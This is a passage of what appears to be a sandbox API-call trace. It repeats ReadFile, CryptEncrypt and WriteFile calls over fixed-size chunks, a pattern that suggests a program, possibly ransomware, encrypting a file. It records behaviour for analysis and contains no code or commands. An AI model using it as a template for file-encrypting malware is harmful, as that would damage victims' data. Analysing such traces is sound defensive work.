pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.992] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.992] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.992] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.992] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.992] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.992] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.992] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.992] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.992] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.992] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.992] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.993] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.993] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.993] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0283.993] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0283.993] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.012] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.018] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.018] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.018] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.018] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.018] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.018] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.018] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.018] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.018] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.018] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.018] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.018] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.019] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.019] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.019] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.019] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.019] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.019] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.019] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.019] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.019] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.019] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.019] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.019] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.019] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.019] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.020] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.020] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.020] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.020] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.020] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.020] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.020] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.020] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.020] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.020] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.020] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.020] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.020] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.020] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.020] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.021] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.021] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.021] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.021] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.021] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.021] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.021] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.021] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.021] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.021] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.021] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.021] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.021] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.022] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.023] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.023] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.023] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.023] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.023] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.024] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.024] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.024] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.024] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.024] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.024] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.024] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.024] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.024] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.024] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.024] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.024] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.024] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.024] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.025] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.025] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.025] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.025] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e5d8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e5d8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0284.025] CryptEncrypt (in: hKey=0x2fc448, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e5d8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0284.025] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e5d8*, nNumberOfBytesToWrite=0x380, 